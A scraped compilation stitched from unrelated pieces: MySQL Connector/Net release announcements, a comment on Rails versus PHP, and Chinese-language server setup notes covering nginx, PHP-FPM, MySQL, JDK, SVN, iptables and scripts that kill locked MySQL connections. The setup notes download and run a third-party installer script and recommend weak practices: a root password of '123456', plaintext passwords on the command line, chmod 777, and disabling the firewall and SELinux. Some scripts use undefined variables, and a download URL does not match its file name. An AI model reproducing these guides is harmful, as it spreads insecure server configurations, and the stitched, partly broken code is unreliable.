MySQL Connector/Net 6.4.1, a new version of the all-managed .NET driver for MySQL has been released.  This release is of Beta quality and is intended for testing and exposure to new features.  We strongly urge you to not use this release in a production environment.

Version 6.4.1 is intended for use with versions of MySQL from 5.0 - 5.5

It is now available in source and binary form from [http://dev.mysql.com/downloads/connector/net/6.4.html] and mirror sites (note that not all mirror sites may be up to date at this point in time; if you can't find this version on some mirror, please try again later or choose another download site.)

** New features found in 6.4 include (please see release notes for more information) **

* Windows Authentication*
This release includes our new support for Windows authentication when connecting to MySQL Server 5.5.

* Table Caching *
We are also introducing a new feature called table caching.  This feature makes it possible to cache the rows of slow changing tables on the client side.

* Simple connection fail-over support *

We are also including some SQL generation improvements related to our entity framework provider.

Enjoy and thanks for the support!
          MySQL Connector/Net 6.4.0 Alpha has been released        
MySQL Connector/Net 6.4.0, a new version of the all-managed .NET driver for MySQL has been released. This release is of Alpha quality and is intended for testing and exposure to new features. We strongly urge you to not use this release in a production environment.

Version 6.4.0 is intended for use with versions of MySQL from 5.0 - 5.5

It is now available in source and binary form from here and mirror sites (note that not all mirror sites may be up to date at this point in time; if you can't find this version on some mirror, please try again later or choose another download site.)

New features in this release (please see release notes for more information)

Windows Authentication
This release includes our new support for Windows authentication when connecting to MySQL Server 5.5.

Table Caching
We are also introducing a new feature called table caching. This feature makes it possible to cache the rows of slow changing tables on the client side.

We are also including some SQL generation improvements related to our entity framework provider.

Enjoy and thanks for the support!
          MySQL Connector/Net 6.3.5 maintenance released        

We're happy to announce the latest maintenance release of MySQL Connector/Net 6.3.5.

Version 6.3.5 maintenance release includes:

  • Fixes to some installer bugs related to .NET Framework 4.0

  • Fixes for several other bugs

For details see http://dev.mysql.com/doc/refman/5.1/en/connector-net-news-6-3-5.html

MySQL Connector/Net 6.3.5:

  1. Provides secure, high-performance data connectivity with MySQL.

  2. Implements ADO.NET interfaces that integrate into ADO.NET aware tools.

  3. Is a fully managed ADO.NET driver written in 100% pure C#.

  4. Provides Visual Studio integration

If you are a current user, we look forward to your feedback on all the new capabilities we are delivering.

As always, you will find binaries and source on our download pages.

Please get your copy from http://dev.mysql.com/downloads/connector/net/6.3.html.

To get started quickly, please take a look at our short tutorials.

MySQL Connector/NET Tutorials

Blog postings and general information can be found on our Developer Zone site.

MySQL Developer Zone

.NET Forum


Connector/NET documentation and details on changes between releases can be found on these pages

If you need any additional info or help please get in touch with us by posting in our forums or leaving comments on our blog pages.

          MySQL Connector/Net 6.3.4 GA has been released        
We're proud to announce the next release of MySQL Connector/Net version 6.3.4.  This release is GA (Generally Available).

We hope you will make MySQL Connector/Net your preferred set of .NET components including our ADO.Net library and other Microsoft .NET frameworks components such as our Visual Studio plugin and Entity Framework for MySQL.

We are dedicated to providing the best tools for your MySQL database .NET applications.

Special thanks go to all the great MySQL beta testers that provided valuable ideas, insights, and bug reports to the Connector/Net team.  Your beta feedback truly helped us improve the product.

Version 6.3.4 provides the following new features:
- The ability to dynamically enable/disable query analysis at runtime.
- Visual Studio 2010 compatibility
- Improved compatibility with Visual Studio wizards using our new SQL Server mode
- Support for Model-First development using Entity Framework
- Nested transaction scopes
- Other improvements and bug fixes!
For details see

If you are a current user, we look forward to your feedback on all the new capabilities we are delivering.  As always, you will find binaries and source on our download pages.

Please get your copy from http://dev.mysql.com/downloads/connector/net/6.3.html

To get started quickly, please take a look at our short tutorials.

MySQL Connector/NET Tutorials

Blog postings and general information can be found on our Developer Zone site.

MySQL Developer Zone

.NET Forum


Connector/NET Documentation and details on changes between releases can be found on these pages

If you need any additional info or help please get in touch with us.  Post in our forums or leave comments on our blog pages.
          Comment on "Why favor PostgreSQL over MariaDB / MySQL" by pzzcc        
Thank you for pointing out the real differences; what brought me here was PostGIS. I would be really interested in reading a blog post by you covering those differences and their practical uses (like the PostGIS example you put above).
          Markus Wolff at Thu, 09 Nov 2006 17:19:41 +0100        
I attended the MySQLUG-Hamburg meeting this Monday, where we had a session about Rails' ActiveRecord package. After the session, we got to talk a bit, and comparing Rails (the framework) against PHP (the language) seemed to be a quite common theme. Apples and oranges, I say. If I had to write a web application from scratch in plain Ruby without a framework whatsoever, I'd have little to no advantage over PHP in terms of development speed. In fact, I'd even say that because PHP is optimized for web apps and Ruby is more general-purpose, PHP would win hands down. So all these comparisons you find all over the web really say nothing at all. It becomes a lot more interesting when you start comparing actual frameworks in different languages. Let's say, Rails vs. Symfony vs. Struts vs. ASP.NET? But wait, that would make no sense as well: you would need to compare only frameworks that follow the same design approach. Rails is classic MVC, so it wouldn't make any sense to make a direct comparison between Rails and ASP.NET, as the latter is an event-based component framework. ASP.NET could, for example, be compared to PHP's PRADO. But where to draw the line? Well, no matter what comparisons actually would make sense - comparing frameworks to languages definitely doesn't :-)
          What kind of server does this site operate on?        
Our site is hosted on a Virtual Private Server provided by Stable Host (enter promotional code "VNC" for discounts at checkout). Our current server specifications are (last updated: May 2016): Memory: 4GB; CPU: quad core 2GHz; OS: CentOS 6.7; web server: Apache 2.2, PHP 5.6, MySQL 5.1. Our server is managed by VNC Web Services.
          MySQL: extending the built-in list handling        
MySQL mostly works with lists in CSV format, and the standard set of functions for them is quite weak. This article discusses such lists, the capabilities of the built-in functions, and extending that set with user-defined procedures.
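As a taste of what such list handling involves, the behaviour of MySQL's built-in FIND_IN_SET function can be mimicked in a few lines. This sketch is illustrative and not taken from the article itself:

```python
def find_in_set(value: str, csv_list: str) -> int:
    """Return the 1-based position of value in a comma-separated list,
    or 0 if it is absent -- mirroring MySQL's FIND_IN_SET()."""
    items = csv_list.split(",") if csv_list else []
    return items.index(value) + 1 if value in items else 0

print(find_in_set("b", "a,b,c"))  # -> 2
print(find_in_set("x", "a,b,c"))  # -> 0
```

Anything beyond lookups (set union, deduplication, sorting a list in place) is exactly the territory where, as the article notes, MySQL's built-ins run out and user-defined procedures take over.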
          DBTA - StretchDB, a Cool New Feature in vNext SQL Server        

Originally appearing in my monthly column at Database Trends & Applications magazine. 

When it comes to cloud-based database management, there are really only two players: Amazon, the value leader, and Microsoft, the innovation leader. Amazon has carved out its niche by supporting not only its own implementations of various database platforms such as MySQL and Hadoop, but also premier commercial DBMSs such as Microsoft SQL Server and Oracle. Meanwhile, Microsoft has, in my mind, carved out a very strong niche as the innovation leader by offering powerful technologies to integrate on-premises databases with various Azure services.


I described some of the innovations Microsoft is making in the cloud in previous articles, such as one last January in which I described a raft of new cloud offerings in SQL Server 2014, and one last April in which I wrote about the Hadoop-powered offerings of SQL Server HDInsight. Microsoft continues to do cool things in this space, including a feature announced last November at the PASS Summit 2014 conference called StretchDB.

Want to know more? Read the rest of this article HERE.

Tell me what you think!


Connect with me online! Facebook | Twitter | LinkedIn | Blog | SlideShare | YouTube Google Author

           Installing Nginx, PHP 7 and PHP-FPM on CentOS 7        

  1. Install nginx 
    CentOS 7 has no built-in nginx package, so first go to the nginx site at http://nginx.org/en/linux_packages.html#stable, find the link to the nginx-release package for CentOS 7, and install it as follows:
    rpm -Uvh http://nginx.org/packages/centos/7/noarch/RPMS/nginx-release-centos-7-0.el7.ngx.noarch.rpm
    After installation, a yum repository configuration is generated automatically (in /etc/yum.repos.d/nginx.repo), 
    so nginx can then be installed with yum:
    yum install nginx
  2. Start nginx 
    Services used to be managed with chkconfig; CentOS 7 manages system services with systemctl instead: 
    systemctl start nginx
    systemctl status nginx
    Check the current startup setting of the nginx service:
    systemctl list-unit-files | grep nginx
    If it is disabled, enable it to start at boot:
    systemctl enable nginx
    If a firewall is configured, check its state and whether the port nginx uses is open:
    firewall-cmd --state
    Permanently open the firewall's http service:
    firewall-cmd --permanent --zone=public --add-service=http
    firewall-cmd --reload
    List the firewall settings for the public zone:
    firewall-cmd --list-all --zone=public
    After the steps above, the default nginx page should be reachable from a browser.
  3. Install PHP-FPM 
    Install php, php-fpm and php-mysql with yum:
    yum install php php-fpm php-mysql
    Check the current startup setting of the php-fpm service: 
    systemctl list-unit-files | grep php-fpm
    systemctl enable php-fpm
    systemctl start php-fpm
    systemctl status php-fpm
  4. Change how PHP-FPM listens 
    To switch PHP-FPM to listening on a unix socket, edit /etc/php-fpm.d/www.conf and change the listen line: 
    listen =
    listen = /var/run/php-fpm/php-fpm.sock
    Then restart php-fpm:
    systemctl restart php-fpm
    Note: do not use listen = /tmp/php-fcgi.sock (putting php-fcgi.sock under /tmp). When the system creates the socket it ends up in a random private directory such as /tmp/systemd-private-*/tmp/php-fpm.sock, unless the PrivateTmp=true setting under /usr/lib/systemd/system/ is changed to PrivateTmp=false; and even then other problems can arise, so it is easiest to simply use a different location. 
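With PHP-FPM listening on the unix socket above, the matching nginx side is a fastcgi_pass pointing at the same socket. This is a minimal sketch; server_name and root are placeholders for your own site:

```nginx
server {
    listen       80;
    server_name  example.com;            # placeholder
    root         /usr/share/nginx/html;  # placeholder document root

    location ~ \.php$ {
        include        fastcgi_params;
        fastcgi_pass   unix:/var/run/php-fpm/php-fpm.sock;  # must match the listen line above
        fastcgi_index  index.php;
        fastcgi_param  SCRIPT_FILENAME  $document_root$fastcgi_script_name;
    }
}
```

If the paths on either side disagree, nginx answers every PHP request with 502 Bad Gateway, which is the quickest symptom to check first.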


    # yum remove php*

    Install the yum repositories for PHP 7 via rpm

    CentOS/RHEL 7.x:

    # rpm -Uvh https://dl.fedoraproject.org/pub/epel/epel-release-latest-7.noarch.rpm # rpm -Uvh https://mirror.webtatic.com/yum/el7/webtatic-release.rpm

    CentOS/RHEL 6.x:
    # rpm -Uvh https://mirror.webtatic.com/yum/el6/latest.rpm


    yum install php70w php70w-opcache


    Configure (configure), compile (make), install (make install)

    Use configure --help


    Configuration:
      --cache-file=FILE       cache test results in FILE
      --help                  print this message
      --no-create             do not create output files
      --quiet, --silent       do not print `checking...' messages
      --version               print the version of autoconf that created configure
    Directory and file names:
      --prefix=PREFIX         install architecture-independent files in PREFIX [/usr/local]
      --exec-prefix=EPREFIX   install architecture-dependent files in EPREFIX



    Directory for executable programs; the default is EXEC-PREFIX/bin
    Directory for read-only files needed by the installed programs; the default is PREFIX/share
    Directory for miscellaneous configuration files; the default is PREFIX/etc
    Directory for library files and dynamically loadable modules; the default is EXEC-PREFIX/lib
    Directory for C and C++ header files; the default is PREFIX/include
    Documentation files (other than "man" pages) are installed into this directory; the default is PREFIX/doc
    Man pages shipped with the programs are installed into this directory, in their corresponding manx subdirectories; the default is PREFIX/man
    Note: to reduce pollution of shared installation locations (such as /usr/local/include), configure automatically appends the string "/postgresql" to datadir, sysconfdir, includedir and docdir, unless the fully expanded directory name already contains the string "postgres" or "pgsql". For example, if you choose /usr/local as the prefix, C header files are installed in /usr/local/include/postgresql; but if the prefix is /opt/postgres, they go into /opt/postgres/include
    DIRECTORIES is a colon-separated list of directories that will be added to the compiler's header-file search path. If you have optional packages (such as GNU Readline) installed in a non-standard location, you must use this option, and probably the corresponding --with-libraries option as well.
    DIRECTORIES is a colon-separated list of directories in which to search for library files. You will probably need this option (and the corresponding --with-includes option) if you have packages installed in non-standard locations.

    • PHP-FPM configuration reference
      pid = /usr/local/php/var/run/php-fpm.pid
      error_log = /usr/local/php/var/log/php-fpm.log
      listen = /var/run/php-fpm/php-fpm.sock
      user = www
      group = www
      pm = dynamic
      pm.max_children = 800
      pm.start_servers = 200
      pm.min_spare_servers = 100
      pm.max_spare_servers = 800
      pm.max_requests = 4000
      rlimit_files = 51200
      listen.backlog = 65536
      ;65536 is used because -1 may not actually mean unlimited
      ;see http://php.net/manual/en/install.fpm.configuration.php#104172
      slowlog = /usr/local/php/var/log/slow.log
      request_slowlog_timeout = 10
    • nginx.conf configuration reference 
      user  nginx;
      worker_processes  8;
      error_log  /var/log/nginx/error.log warn;
      pid		/var/run/nginx.pid;
      events {
        use epoll;
        worker_connections  65535;
      }
      worker_rlimit_nofile 65535;
      #without this, you may see the error: 65535 worker_connections exceed open file resource limit: 1024
      http {
        include	   /etc/nginx/mime.types;
        default_type  application/octet-stream;
        log_format  main  '$remote_addr - $remote_user [$time_local] "$request" '
                  '$status $body_bytes_sent "$http_referer" '
                  '"$http_user_agent" "$http_x_forwarded_for"';
        access_log  /var/log/nginx/access.log  main;
        sendfile		on;
        tcp_nopush	 on;
        keepalive_timeout  65;
        server_names_hash_bucket_size 128;
        client_header_buffer_size 32k;
        large_client_header_buffers 4 32k;
        client_max_body_size 8m;
        server_tokens  off;
        client_body_buffer_size  512k;
        # fastcgi
        fastcgi_connect_timeout 300;
        fastcgi_send_timeout 300;
        fastcgi_read_timeout 300;
        fastcgi_buffer_size 64k;
        fastcgi_buffers 4 64k;
        fastcgi_busy_buffers_size 128k;
        fastcgi_temp_file_write_size 128k;
        fastcgi_intercept_errors on;
        #gzip (see http://nginx.org/en/docs/http/ngx_http_gzip_module.html)
        gzip  off;
        gzip_min_length  1k;  #only compress responses of 1k or larger
        gzip_buffers 32  4k;
          #use getconf PAGESIZE to get the system's memory page size
        gzip_http_version  1.0;
        gzip_comp_level  2;
        gzip_types  text/css text/xml application/javascript application/atom+xml application/rss+xml text/plain application/json;
          #see the nginx mime.types file (/etc/nginx/mime.types) for the type definitions
        gzip_vary  on;
        include /etc/nginx/conf.d/*.conf;
      }
      If the error setrlimit(RLIMIT_NOFILE, 65535) failed (1: Operation not permitted) appears, check the open-file limit: 
      ulimit -n
      If the value is too small, edit /etc/security/limits.conf:
      vi /etc/security/limits.conf
      * soft nofile 65535
      * hard nofile 65535

Alpha 2016-08-10 13:44

          Installing PHP, Nginx, MySQL, JDK 8 and SVN on Ubuntu 14.04        

Install the MySQL 5 database

To install MySQL, run:

sudo apt-get install mysql-server mysql-client

To move MySQL's datadir from the default /var/lib/mysql to /app/data/mysql:
1. Edit /etc/mysql/my.cnf and set: datadir = /app/data/mysql
2. cp -a /var/lib/mysql /app/data/
3. /etc/init.d/mysql start

If the system reports an error and MySQL fails to start, with the log showing: Can't find file: './mysql/plugin.frm' (errno: 13)
[ERROR] Can't open the mysql.plugin table. Please run mysql_upgrade to create it.


then AppArmor is still confining MySQL to the old path; update its profile:
1. In usr.sbin.mysqld, change two lines: /var/lib/mysql/ r, to /app/data/mysql/ r, and /var/lib/mysql/** rwk, to /app/data/mysql/** rwk,
2. In abstractions/mysql, change one line: /var/lib/mysql/mysql.sock rw, to /app/data/mysql/mysql.sock rw,
3. Reload the apparmor service: /etc/init.d/apparmor reload
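Taken together, the profile edits above amount to the following lines (a sketch; on a default Ubuntu install the profiles live under /etc/apparmor.d/):

```
# /etc/apparmor.d/usr.sbin.mysqld: replace the two /var/lib/mysql lines with
  /app/data/mysql/ r,
  /app/data/mysql/** rwk,

# /etc/apparmor.d/abstractions/mysql: replace the socket line with
  /app/data/mysql/mysql.sock rw,
```

After reloading apparmor, mysqld is allowed to read and lock files under the new datadir and to use the relocated socket.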

Install Nginx

Before installing Nginx, if Apache2 is already installed, remove it first, then install nginx:

service apache2 stop
update-rc.d -f apache2 remove
sudo apt-get remove apache2

sudo apt-get install nginx

Install PHP5

PHP5 has to run through PHP-FPM to work with nginx; install it with:

sudo apt-get install php5-fpm



sudo apt-get install php5-gd libapache2-mod-auth-mysql php5-mysql openssl libssl-dev

sudo apt-get install curl libcurl3 libcurl3-dev php5-curl

Install JDK 8


lxh@ubuntu:~$ wget -c http://download.oracle.com/otn-pub/java/jdk/8u11-b12/jdk-8u25-linux-x64.tar.gz


lxh@ubuntu:~$ mkdir -p /usr/lib/jvm 
lxh@ubuntu:~$ sudo mv jdk-8u25-linux-x64.tar.gz /usr/lib/jvm
lxh@ubuntu:~$ cd /usr/lib/jvm
lxh@ubuntu:~$ sudo tar xzvf jdk-8u25-linux-x64.tar.gz


lxh@ubuntu:~$ sudo vim ~/.profile


export JAVA_HOME=/usr/lib/jvm/jdk1.8.0_25/
export JRE_HOME=/usr/lib/jvm/jdk1.8.0_25/jre
export CLASSPATH=.:$JAVA_HOME/lib/dt.jar:$JAVA_HOME/lib/tools.jar:$JAVA_HOME/lib:$JRE_HOME/lib:$CLASSPATH
export PATH=$JAVA_HOME/bin:$PATH


lxh@ubuntu:~$ source ~/.profile



sudo update-alternatives --install /usr/bin/java java /usr/lib/jvm/jdk1.8.0_25/bin/java 300
sudo update-alternatives --install /usr/bin/javac javac /usr/lib/jvm/jdk1.8.0_25/bin/javac 300
sudo update-alternatives --config java

Because I installed Ubuntu 14.04 in a virtual machine, OpenJDK is not installed by default, so there was no JDK version to choose between. On a physical-machine install of Ubuntu, several candidates may appear that can replace java (providing /usr/bin/java).


1. Download the latest nginx
3. Build and install
$ ./configure  #check build prerequisites
$ make  #compile
$ sudo make install  #install with sudo privileges
The installed files go under /usr/local/
1) Create a file named nginx (note: no extension) in the /etc/init.d/ directory and copy the following content into it (thanks to the brother who provided the script).
#! /bin/sh
#Script that registers Nginx as a system service
#Author CplusHua
#http://www.219.me
#chkconfig: - 85 15
set -e
PATH=/usr/local/sbin:/usr/local/bin:/sbin:/bin:/usr/sbin:/usr/bin
DESC="Nginx Daemon"
NAME=nginx
DAEMON=/usr/local/nginx/sbin/$NAME
SCRIPTNAME=/etc/init.d/$NAME
#exit if the daemon binary does not exist
test -x $DAEMON || exit 0
d_start(){
  $DAEMON || echo -n "already running"
}
d_stop(){
  $DAEMON -s quit || echo -n "not running"
}
d_reload(){
  $DAEMON -s reload || echo -n "could not reload"
}
case "$1" in
  start)
    echo -n "Starting $DESC: $NAME"
    d_start
    echo "."
  ;;
  stop)
    echo -n "Stopping $DESC: $NAME"
    d_stop
    echo "."
  ;;
  reload)
    echo -n "Reloading $DESC: configuration.."
    d_reload
    echo "reloaded."
  ;;
  restart)
    echo -n "Restarting $DESC: $NAME"
    d_stop
    sleep 3
    d_start
    echo "."
  ;;
  *)
    echo "Usage: $SCRIPTNAME {start|stop|restart|reload}" >&2
    exit 3
  ;;
esac
exit 0

    $ sudo chmod +x nginx
3) Start it as a service. If Nginx was already running before the service was configured, stop it first:
    $ sudo service nginx stop
    $ sudo service nginx start

If nginx reports the error connect() to unix:/var/run/php5-fpm.sock failed (13: Permission denied), set the socket ownership in the php5-fpm pool configuration:


    listen.owner = www-data
    listen.group = www-data
    listen.mode = 0660

    $ sudo service php5-fpm restart

Quickly setting up an SVN server on Ubuntu 14.04, and day-to-day usage


    # apt-get install subversion
    # sudo mkdir /app/svn
    # sudo svnadmin create /app/svn/prj

  # sudo vi svnserve.conf  # uncomment the following parameters
  anon-access = none    # anonymous access; default is read, none disallows access
  auth-access = write   # permissions for authenticated users
  password-db = passwd  # user credentials file; defaults to conf/ under the repository, an absolute path may also be given
  authz-db = authz

  # sudo vi passwd    # format is username = password, in plain text
  xiaoming = 123
  zhangsan = 123
  lisi = 123

# sudo vi authz
  [groups]           # define group members
  manager = xiaoming
  core_dev = zhangsan,lisi
  [repos:/]          # the manager group gets read-write access from the root of the repos repository
  @manager = rw
  [repos:/media]     # core_dev gets read-write access to the media directory of the repos repository
  @core_dev = rw


  # sudo svnserve -d -r /app/svn
  # Check whether it started successfully; it should be listening on port 3690
  # sudo netstat -antp | grep svnserve
  tcp    0      0*      LISTEN    28967/svnserve
  # To stop the service, use pkill svnserve

  # Access the repository URL

   svnadmin dump backups
  # Full backup
  svnadmin dump /app/svn/prj > YYmmdd_fully_backup.svn
  # Full compressed backup
  svnadmin dump /app/svn/prj | gzip > YYmmdd_fully_backup.gz
  # Restoring a backup
  svnadmin load /app/svn/prj < YYmmdd_fully_backup.svn
  zcat YYmmdd_fully_backup.gz | svnadmin load /app/svn/prj
  ### Incremental backup ###
  # First take a full backup of a revision range
  svnadmin dump /app/svn/prj -r 0:100 > YYmmdd_incremental_backup.svn
  # Then take incremental backups of later ranges (use a distinct file name)
  svnadmin dump /app/svn/prj -r 101:200 --incremental > YYmmdd_incremental_backup2.svn
svnadmin hotcopy backups

  # Backup
  svnadmin hotcopy /app/svn/prj YYmmdd_fully_backup --clean-logs
  # Restore
  svnadmin hotcopy YYmmdd_fully_backup /app/svn/prj

Tomcat memory tuning


Add this in tomcat's bin/catalina.sh, before the cygwin=false line. Note that the quotes must be included; the JAVA_OPTS line below is the new addition.

# OS specific support. $var _must_ be set to either true or false.
JAVA_OPTS="-server -Xms512M -Xmx512M -Xss256K -Djava.awt.headless=true -Dfile.encoding=utf-8 -XX:PermSize=64M -XX:MaxPermSize=128m"


Posted by Alpha on 2015-10-07 15:28

          Opening port 80 in iptables         

Regular CentOS users may have run into the same problem I did recently while installing and configuring Oracle behind the CentOS firewall.





/sbin/iptables -I INPUT -p tcp --dport 80 -j ACCEPT
/sbin/iptables -I INPUT -p tcp --dport 22 -j ACCEPT


/etc/rc.d/init.d/iptables save
On CentOS 5.3/5.4 and later, use:
service iptables save


/etc/init.d/iptables restart


Check the CentOS firewall status: /etc/init.d/iptables status

Stop the CentOS firewall service: /etc/init.d/iptables stop


chkconfig --level 35 iptables off


iptables -P INPUT DROP

This rejects all access to this CentOS 5.3 system except for the rules in Chain RH-Firewall-1-INPUT (2 references).

After configuring iptables from the command line you must still run service iptables save for the rules to be written to the configuration file.

cat /etc/sysconfig/iptables shows the contents of the iptables firewall configuration file.

# Generated by iptables-save v1.3.5 on Sat Apr 14 07:51:07 2001
:OUTPUT ACCEPT [1513:149055]
:RH-Firewall-1-INPUT - [0:0]
-A INPUT -j RH-Firewall-1-INPUT
-A FORWARD -j RH-Firewall-1-INPUT
-A RH-Firewall-1-INPUT -i lo -j ACCEPT
-A RH-Firewall-1-INPUT -p icmp -m icmp --icmp-type any -j ACCEPT
-A RH-Firewall-1-INPUT -p esp -j ACCEPT
-A RH-Firewall-1-INPUT -p ah -j ACCEPT
-A RH-Firewall-1-INPUT -d -p udp -m udp --dport 5353 -j ACCEPT
-A RH-Firewall-1-INPUT -p udp -m udp --dport 631 -j ACCEPT
-A RH-Firewall-1-INPUT -p tcp -m tcp --dport 631 -j ACCEPT
-A RH-Firewall-1-INPUT -m state --state RELATED,ESTABLISHED -j ACCEPT
-A RH-Firewall-1-INPUT -p tcp -m state --state NEW -m tcp --dport 22 -j ACCEPT
-A RH-Firewall-1-INPUT -j REJECT --reject-with icmp-host-prohibited
# Completed on Sat Apr 14 07:51:07 2001

CentOS firewall configuration for port 80
#/sbin/iptables -I INPUT -p tcp --dport 80 -j ACCEPT
#/sbin/iptables -I INPUT -p tcp --dport 22 -j ACCEPT

#/etc/rc.d/init.d/iptables save

[root@vcentos ~]# /etc/init.d/iptables status
Table: filter
Chain INPUT (policy ACCEPT)
num target prot opt source destination
1 ACCEPT udp -- udp dpt:80
2 ACCEPT tcp -- tcp dpt:80
3 RH-Firewall-1-INPUT all --

Chain FORWARD (policy ACCEPT)
num target prot opt source destination
1 RH-Firewall-1-INPUT all --

* Set iptables to start automatically
chkconfig --level 2345 iptables on



* Rule to open a port
iptables -A INPUT -p tcp -s xxx.xxx.xxx.xxx --dport 3306 -j ACCEPT

* Rule to close it again
iptables -D INPUT -p tcp -s xxx.xxx.xxx.xxx --dport 3306 -j ACCEPT

Can't reach nginx on port 80? Make sure loopback traffic is accepted:
 iptables -A INPUT -i lo -j ACCEPT 

Posted by Alpha on 2012-09-17 23:59


[root@CentOS ~]# chkconfig iptables off

vi /etc/sysconfig/selinux

3. Configure a third-party yum repository on CentOS 6.0 (the default CentOS repositories do not include an nginx package)
[root@CentOS ~]# yum install wget
[root@CentOS ~]# wget http://www.atomicorp.com/installers/atomic
// download the atomic yum repository installer
[root@CentOS ~]# sh ./atomic
[root@CentOS ~]# yum check-update

[root@CentOS ~]# yum -y install ntp make openssl openssl-devel pcre pcre-devel libpng \
libpng-devel libjpeg-6b libjpeg-devel-6b freetype freetype-devel gd gd-devel zlib zlib-devel \
gcc gcc-c++ libXpm libXpm-devel ncurses ncurses-devel libmcrypt libmcrypt-devel libxml2 \
libxml2-devel imake autoconf automake screen sysstat compat-libstdc++-33 curl curl-devel

[root@CentOS ~]# yum remove httpd
[root@CentOS ~]# yum remove mysql
[root@CentOS ~]# yum remove php

[root@CentOS ~]# yum install nginx
[root@CentOS ~]# service nginx start
[root@CentOS ~]# chkconfig --levels 235 nginx on

[root@CentOS ~]# yum install mysql mysql-server mysql-devel
[root@CentOS ~]# service mysqld start
[root@CentOS ~]# chkconfig --levels 235 mysqld on
[root@CentOS ~]# mysqladmin -u root password "123456"
[root@CentOS ~]# service mysqld restart

[root@CentOS ~]# yum install php lighttpd-fastcgi php-cli php-mysql php-gd php-imap php-ldap \
php-odbc php-pear php-xml php-xmlrpc php-mbstring php-mcrypt php-mssql php-snmp php-soap \
php-tidy php-common php-devel php-fpm
[root@CentOS ~]# service php-fpm start
[root@CentOS ~]# chkconfig --levels 235 php-fpm on

[root@CentOS ~]# mv /etc/nginx/nginx.conf /etc/nginx/nginx.confbak
[root@CentOS ~]# cp /etc/nginx/nginx.conf.default /etc/nginx/nginx.conf
[root@CentOS ~]# vi /etc/nginx/nginx.conf
index index.php index.html index.htm;
location ~ \.php$ {
root /usr/share/nginx/html;
fastcgi_index index.php;
fastcgi_param SCRIPT_FILENAME /usr/share/nginx/html$fastcgi_script_name;
include fastcgi_params;
}

// Edit php.ini and add cgi.fix_pathinfo = 1 at the end of the file
[root@CentOS ~]# vi /etc/php.ini

11. Restart nginx and php-fpm
[root@CentOS ~]# service nginx restart
[root@CentOS ~]# service php-fpm restart

[root@CentOS ~]# vi /usr/share/nginx/html/info.php


Posted by Alpha on 2012-09-12 18:39




  That solves it. But killing only the first locking process brought no improvement, so let's kill every process that is locking tables instead. A simple script:
mysql -uroot -e "show processlist" | grep -i "Locked" >> locked_log.txt

for line in `cat locked_log.txt | awk '{print $1}'`
do
  mysql -uroot -e "kill $line"
done

Or kill the ids straight from mysqladmin:

for id in `mysqladmin processlist | grep -i locked | awk '{print $1}'`
do
  mysql -uroot -e "kill $id"
done


mysql> SELECT concat('KILL ',id,';') FROM information_schema.processlist WHERE user='root';
+------------------------+
| concat('KILL ',id,';') |
+------------------------+
| KILL 3101;             |
| KILL 2946;             |
+------------------------+
2 rows in set (0.00 sec)

mysql> SELECT concat('KILL ',id,';') FROM information_schema.processlist WHERE user='root' INTO OUTFILE '/tmp/a.txt';
Query OK, 2 rows affected (0.00 sec)

mysql> source /tmp/a.txt;
Query OK, 0 rows affected (0.00 sec)


  Under heavy concurrency, the MySQL + PHP model often leaves MySQL with a large number of zombie processes, which can hang the service. To kill these automatically I put a script on the server that runs via crontab, and it has noticeably eased the problem. Here is the script, shared with a few modifications for my own needs:

$mysqladmin_exec -uroot -p"$mysql_pwd" processlist | awk '{ print $12 , $2 ,$4}' | grep -v Time | grep -v '|' | sort -rn > $mysql_timeout_log
awk '{if($1>30 && $3!="root") print "'""$mysql_exec""' -e " "\"" "kill",$2 "\"" " -uroot " "-p""\"""'""$mysql_pwd""'""\"" ";" }' $mysql_timeout_log > $mysql_kill_timeout_sh
echo "check start ...." >> $mysql_kill_timeout_log
echo `date` >> $mysql_kill_timeout_log
cat $mysql_kill_timeout_sh

  Save this as mysqld_kill_sleep.sh, then run chmod 0 mysqld_kill_sleep.sh followed by chmod u+rx mysqld_kill_sleep.sh, and run it from cron under the root account, adjusting the schedule as needed. Running it prints:
www# ./mysqld_kill_sleep.sh
/usr/local/bin/mysql -e "kill 27549" -uroot -p"the MySQL root password";
/usr/local/bin/mysql -e "kill 27750" -uroot -p"the MySQL root password";
/usr/local/bin/mysql -e "kill 27840" -uroot -p"the MySQL root password";
/usr/local/bin/mysql -e "kill 27867" -uroot -p"the MySQL root password";
/usr/local/bin/mysql -e "kill 27899" -uroot -p"the MySQL root password";
/usr/local/bin/mysql -e "kill 27901" -uroot -p"the MySQL root password";
/usr/local/bin/mysql -e "kill 27758" -uroot -p"the MySQL root password";
/usr/local/bin/mysql -e "kill 27875" -uroot -p"the MySQL root password";
/usr/local/bin/mysql -e "kill 27697" -uroot -p"the MySQL root password";
/usr/local/bin/mysql -e "kill 27888" -uroot -p"the MySQL root password";
/usr/local/bin/mysql -e "kill 27861" -uroot -p"the MySQL root password";

$mysql_exec -uroot -p$mysql_pwd -e "show processlist" | grep -i "Locked" >> $mysql_kill_timeout_log
chmod 777 $mysql_kill_timeout_log
for line in `cat $mysql_kill_timeout_log | awk '{print $1}'`
do
  echo "$mysql_exec -uroot -p$mysql_pwd -e \"kill $line\"" >> $mysql_kill_timeout_sh
done
chmod 777 $mysql_kill_timeout_sh
cat $mysql_kill_timeout_sh
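The awk pipeline above is dense; the same filtering idea can be sketched in a few lines of Python. This is illustrative only: the (id, user, time) tuple layout and the 30-second threshold are assumptions mirroring the shell script, not MySQL's own API.

```python
# Sketch of the kill-script logic: emit KILL statements for non-root
# connections that have been in their current state for more than 30 s.
def kill_statements(rows, max_seconds=30):
    """rows: iterable of (id, user, time_in_seconds) tuples."""
    return [f"KILL {pid};" for pid, user, secs in rows
            if secs > max_seconds and user != "root"]

rows = [(27549, "www", 84), (27550, "root", 120), (27551, "www", 5)]
print(kill_statements(rows))  # only 27549 qualifies: not root, over 30 s
```

The generated statements would then be fed back to the mysql client, exactly as the shell version does.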

1. Go into the mysql/bin directory and run mysqladmin processlist;
2. Or start mysql and run show processlist;

mysql> show processlist;

+-----+------+------+--------+---------+------+--------+-----------------------------------------------------------+
| Id  | User | Host | db     | Command | Time | State  | Info                                                      |
+-----+------+------+--------+---------+------+--------+-----------------------------------------------------------+
| 207 | root |      | mytest | Sleep   |    5 |        | NULL                                                      |
| 208 | root |      | mytest | Sleep   |    5 |        | NULL                                                      |
| 220 | root |      | mytest | Query   |   84 | Locked | select bookname,culture,value,type from book where id=001 |
+-----+------+------+--------+---------+------+--------+-----------------------------------------------------------+

